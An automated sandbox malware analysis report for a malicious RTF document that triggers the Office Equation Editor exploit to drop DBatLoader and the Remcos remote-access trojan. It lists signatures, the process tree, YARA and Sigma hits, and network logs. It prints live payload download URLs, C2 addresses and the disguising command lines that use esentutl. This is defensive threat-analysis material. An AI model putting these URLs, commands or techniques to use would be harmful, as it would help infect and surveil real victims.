Windows Analysis Report
K0hpP6V2fo.rtf

Overview

General Information

Sample name: K0hpP6V2fo.rtf (renamed because original name is a hash value)
Original sample name: 7a9a05109dd848058fd327bc38459a3d.rtf
Analysis ID: 1517947
MD5: 7a9a05109dd848058fd327bc38459a3d
SHA1: a086488bd204ca42e9d522b769b94c9467ad5520
SHA256: 9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2
Tags: rtf, user-abuse_ch

Detection

DBatLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Equation Editor Network Connection
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3536 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3620 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • audiodg.exe (PID: 3780 cmdline: "C:\Users\user\AppData\Roaming\audiodg.exe" MD5: BBF710C83246092A538128620853D4FD)
        • cmd.exe (PID: 3860 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" " MD5: AD7B9C14083B52BC532FBA5948342B98)
          • esentutl.exe (PID: 3884 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: D2DB315B866148D6AAA9E0B3AB31B011)
          • esentutl.exe (PID: 3904 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: D2DB315B866148D6AAA9E0B3AB31B011)
        • esentutl.exe (PID: 3916 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Roaming\audiodg.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o MD5: D2DB315B866148D6AAA9E0B3AB31B011)
        • SndVol.exe (PID: 3940 cmdline: C:\Windows\System32\SndVol.exe MD5: 2305BFF2966D73694972FD7531BC5BAA)
    • EQNEDT32.EXE (PID: 3200 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • Qzzgbhha.PIF (PID: 3280 cmdline: "C:\Users\Public\Libraries\Qzzgbhha.PIF" MD5: BBF710C83246092A538128620853D4FD)
    • SndVol.exe (PID: 3052 cmdline: C:\Windows\System32\SndVol.exe MD5: 2305BFF2966D73694972FD7531BC5BAA)
  • cleanup
Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Download Url": ["https://maan2u.com/doc/233_Qzzgbhhaaml"]}
Source: K0hpP6V2fo.rtf; Rule: INDICATOR_RTF_MalVer_Objects; Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.; Author: ditekSHen; Strings:
  • 0x14e7:$obj2: \objdata
  • 0x14ff:$obj3: \objupdate
  • 0x14c3:$obj6: \objlink

Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Keylogger_Generic; Description: Yara detected Keylogger Generic; Author: Joe Security
Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_UACBypassusingCMSTP; Description: Yara detected UAC Bypass using CMSTP; Author: Joe Security
Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown; Strings:
  • 0x6c4d0:$a1: Remcos restarted by watchdog!
  • 0x6ca48:$a3: %02i:%02i:%02i:%03i
Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Keylogger_Generic; Description: Yara detected Keylogger Generic; Author: Joe Security

Source: 5.2.audiodg.exe.2d20000.3.unpack; Rule: JoeSecurity_DBatLoader; Description: Yara detected DBatLoader; Author: Joe Security
Source: 5.2.audiodg.exe.2d20000.3.unpack; Rule: JoeSecurity_Keylogger_Generic; Description: Yara detected Keylogger Generic; Author: Joe Security
Source: 5.2.audiodg.exe.2d20000.3.unpack; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 5.2.audiodg.exe.2d20000.3.unpack; Rule: JoeSecurity_UACBypassusingCMSTP; Description: Yara detected UAC Bypass using CMSTP; Author: Joe Security
Source: 5.2.audiodg.exe.2d20000.3.unpack; Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown; Strings:
  • 0xf1948:$a1: Remcos restarted by watchdog!
  • 0xf1ec0:$a3: %02i:%02i:%02i:%03i

Exploits

Source: Network Connection; Author: Joe Security; Data: DestinationIp: 107.175.243.142, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3620, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3620, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe

System Summary

Source: File created; Author: frack113, Nasreddine Bencherchali; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\audiodg.exe, ProcessId: 3780, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Network Connection; Author: Max Altgelt (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3620, Protocol: tcp, SourceIp: 107.175.243.142, SourceIsIpv6: false, SourcePort: 80
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Qzzgbhha.PIF, NewProcessName: C:\Users\Public\Libraries\Qzzgbhha.PIF, OriginalFileName: C:\Users\Public\Libraries\Qzzgbhha.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , ProcessId: 3280, ProcessName: Qzzgbhha.PIF
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\Public\Qzzgbhha.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\audiodg.exe, ProcessId: 3780, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Qzzgbhha
Source: Process started; Author: Jason Lynch; Data: Command: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\audiodg.exe, NewProcessName: C:\Users\user\AppData\Roaming\audiodg.exe, OriginalFileName: C:\Users\user\AppData\Roaming\audiodg.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3620, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , ProcessId: 3780, ProcessName: audiodg.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io; Data: Command: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\audiodg.exe, NewProcessName: C:\Users\user\AppData\Roaming\audiodg.exe, OriginalFileName: C:\Users\user\AppData\Roaming\audiodg.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3620, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , ProcessId: 3780, ProcessName: audiodg.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\audiodg.exe, NewProcessName: C:\Users\user\AppData\Roaming\audiodg.exe, OriginalFileName: C:\Users\user\AppData\Roaming\audiodg.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3620, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , ProcessId: 3780, ProcessName: audiodg.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Qzzgbhha.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\audiodg.exe, ProcessId: 3780, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Qzzgbhha
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Qzzgbhha.PIF, NewProcessName: C:\Users\Public\Libraries\Qzzgbhha.PIF, OriginalFileName: C:\Users\Public\Libraries\Qzzgbhha.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , ProcessId: 3280, ProcessName: Qzzgbhha.PIF
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3620, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3536, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Timestamp: 2024-09-25T09:43:26.396591+0200; SID: 2022050; Severity: 1; Classtype: A Network Trojan was detected; Source IP: 107.175.243.142; Source Port: 80; Destination IP: 192.168.2.22; Destination Port: 49163; Protocol: TCP
Timestamp: 2024-09-25T09:43:26.488041+0200; SID: 2022051; Severity: 1; Classtype: A Network Trojan was detected; Source IP: 107.175.243.142; Source Port: 80; Destination IP: 192.168.2.22; Destination Port: 49163; Protocol: TCP

AV Detection

Source: http://107.175.243.142/340/audiodg.exe; Avira URL Cloud: Label: malware
Source: 5.0.audiodg.exe.400000.0.unpack; Malware Configuration Extractor: DBatLoader {"Download Url": ["https://maan2u.com/doc/233_Qzzgbhhaaml"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe; ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\audiodg.exe; ReversingLabs: Detection: 31%
Source: C:\Users\Public\Libraries\Qzzgbhha.PIF; ReversingLabs: Detection: 31%
Source: K0hpP6V2fo.rtf; ReversingLabs: Detection: 47%
Source: Yara match; File source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\audiodg.exe; Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Qzzgbhha.PIF; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe; Joe Sandbox ML: detected
Source: audiodg.exe, 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_e31da41f-7

Exploits

Source: Yara match; File source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Network connect: IP: 107.175.243.142 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\audiodg.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown; HTTPS traffic detected: 112.137.173.77:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb,$ source: esentutl.exe, 00000008.00000003.393771298.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.8.dr
                  Source: Binary string: easinvoker.pdb source: audiodg.exe, 00000005.00000002.401375610.000000000DA67000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DACA000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.379716518.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DA97000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400087627.0000000001DD6000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbH source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: audiodg.exe, 00000005.00000002.401375610.000000000DA67000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DACA000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401732992.000000000EB20000.00000004.00000800.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.379716518.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401732992.000000000EB4F000.00000004.00000800.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DA97000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400087627.0000000001DD6000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.393771298.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.8.dr
                  Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.395779355.0000000000550000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.9.dr

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: global traffic; DNS query: name: maan2u.com
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
Source: global traffic; TCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
Source: global traffic; TCP traffic: 192.168.2.22:49164 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global traffic, TCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global traffic, TCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
